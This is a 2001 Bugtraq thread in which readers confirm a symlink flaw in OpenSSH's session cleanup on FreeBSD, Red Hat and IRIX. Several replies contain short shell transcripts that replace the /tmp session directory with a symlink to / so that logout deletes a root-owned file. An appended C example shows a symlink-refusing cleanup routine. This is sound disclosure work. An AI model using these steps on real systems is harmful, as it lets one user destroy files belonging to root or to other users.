[20871] in bugtraq


Re: SSH allows deletion of other users files...

daemon@ATHENA.MIT.EDU (aleph1@securityfocus.com)
Tue Jun 5 17:42:29 2001

Date: Tue, 5 Jun 2001 11:30:37 -0600
From: aleph1@securityfocus.com
To: bugtraq@securityfocus.com
Message-ID: <20010605113037.A12758@securityfocus.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3B1BB27A.1020104@bsd.st>

Tomas Ericsson <te@matematik.su.se>

The vulnerability works perfectly for me:
sshd version OpenSSH_2.3.0 green@FreeBSD.org 20010321

# uname -a
FreeBSD myhost 4.3-RELEASE FreeBSD 4.3-RELEASE #0: Sun Apr 22 01:05:25 GMT 2001
root@jkh101.osd.bsdi.com:/usr/src/sys/compile/GENERIC  alpha

[root@myhost root]# echo "testing">/cookies
[root@myhost root]# ls -l /cookies
-rw-r--r--  1 root  wheel  8 Jun  5 01:48 /cookies
[root@myhost root]# ssh -l te myhost
[te@myhost te]# rm -rf /tmp/ssh-1i24iea5
[te@myhost te]# ln -s / /tmp/ssh-1i24iea5
[te@myhost te]# logout
[root@myhost root]# ls -l /cookies
ls: /cookies: No such file or directory


Shannon Lee <shannon@scatter.com>

Reproduced with OpenSSH_2.3.0p1 on Red Hat 6.2.


TE <te@linux.nu>

This vulnerability works fine on both RedHat 7.1 & 7.0 with the latest
updated packages from RedHat installed.

RH71# uname -a
Linux host1 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
RH71# rpm -qa|grep openssh-server
openssh-server-2.5.2p2-5

RH70# uname -a 
Linux host2 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
RH70# rpm -qa|grep openssh-server
openssh-server-2.5.2p2-1.7.2 


"David Thiel" <dthiel@nexprise.com>

I tested this on 4.3-RELEASE, and was successful.
SSH Version OpenSSH_2.3.0 green@FreeBSD.org 20010321


KF <dotslash@snosoft.com>

Works on my box

[root@bounce dotslash]# cat /etc/redhat-release
Red Hat Linux release 7.0 (Guinness)
root@bounce dotslash]# ssh -V
SSH Version OpenSSH_2.1.1, protocol versions 1.5/2.0.
Compiled with SSL (0x0090581f).


Jan-Frode Myklebust <janfrode@parallab.uib.no>

I just tested with OpenSSH_2.5.2p2 on RedHat 7.0,
and OpenSSH_2.9p1 on IRIX 6.5 and both are
vulnerable to this. I used protocol version 2 on
both machines.


Luciano Miguel Ferreira Rocha <strange@nsk.yi.org>

Confirmed on RedHat 7.0 w/ OpenSSH 2.5.2p1. It needs, of course, to have
X forwarding activated.


"Golden_Eternity" <bhodi@bigfoot.com>

I tried to reproduce this on a system running ssh 2.4.0, but I was unable to
locate the /tmp/ssh-* directory.

What version of ssh were you using when you discovered this?

[test@shiva test]$ ssh test@localhost
warning: Need basic cursor movement capablity, using vt100
test's password:
Authentication successful.
Last login: Mon Jun 04 2001 10:42:08 -0700
No mail.
[test@shiva test]$ ls -l /tmp/
total 12
drwxr-xr-x    2 root     root        12288 Apr  8 11:59 lost+found
[test@shiva test]$


"Schlosser, Matt D." <mschlosser@eschelon.com>

On the contrary, it just takes another form:

[root@bob /root]# touch /cookies;ls /cookies
/cookies
[root@bob /root]# ssh zen@localhost
zen@localhost's password:
[zen@bob zen]$ rm -r /tmp/orbit-zen/; ln -s / /tmp/orbit-zen
[zen@bob zen]$ logout
Connection to localhost closed.
[root@bob /root]# ls /cookies
/bin/ls: /cookies: No such file or directory

-- 
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum
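
Added example, not part of the original post and not OpenSSH code: a logout cleanup routine that refuses a session directory that has been replaced by a symlink, which is the condition the transcripts above set up. It assumes the privileged cleanup removes a fixed-name file (here "cookies", as in the transcripts) under the per-session directory; the function names and the /tmp/cleanup-demo-* paths are hypothetical.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Remove `name` inside `dir` only if `dir` is a real directory owned by
 * `owner`. Returns 0 on success, -1 if the directory is refused or unlink fails. */
int safe_session_cleanup(const char *dir, const char *name, uid_t owner)
{
    struct stat st;
    int rc = -1;
    /* O_NOFOLLOW: open() fails when the final path component is a symlink. */
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dfd < 0)
        return -1;
    /* Check the descriptor we hold, then unlink relative to that same inode. */
    if (fstat(dfd, &st) == 0 && S_ISDIR(st.st_mode) && st.st_uid == owner)
        rc = unlinkat(dfd, name, 0);
    close(dfd);
    return rc;
}

/* Constructed scenario: "root" stands in for /, "session" for /tmp/ssh-XXXX.
 * The session path is a symlink to root, as in the transcripts.
 * Returns 1 if cleanup is refused and root/cookies survives, -1 on setup error. */
int demo_symlink_swap(void)
{
    char base[] = "/tmp/cleanup-demo-XXXXXX";
    char root[128], victim[160], session[128];
    if (!mkdtemp(base)) return -1;
    snprintf(root, sizeof root, "%s/root", base);
    snprintf(victim, sizeof victim, "%s/cookies", root);
    snprintf(session, sizeof session, "%s/session", base);
    int fd = -1;
    if (mkdir(root, 0700) || (fd = open(victim, O_CREAT | O_WRONLY, 0600)) < 0
        || symlink(root, session)) return -1;
    close(fd);
    int refused = safe_session_cleanup(session, "cookies", getuid()) == -1;
    int survived = access(victim, F_OK) == 0;
    unlink(victim); unlink(session); rmdir(root); rmdir(base);
    return refused && survived;
}

int main(void) { printf("protected: %d\n", demo_symlink_swap()); return 0; }
```

O_NOFOLLOW only covers the last path component, so the parent of the session directory must not be replaceable by the same user either.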
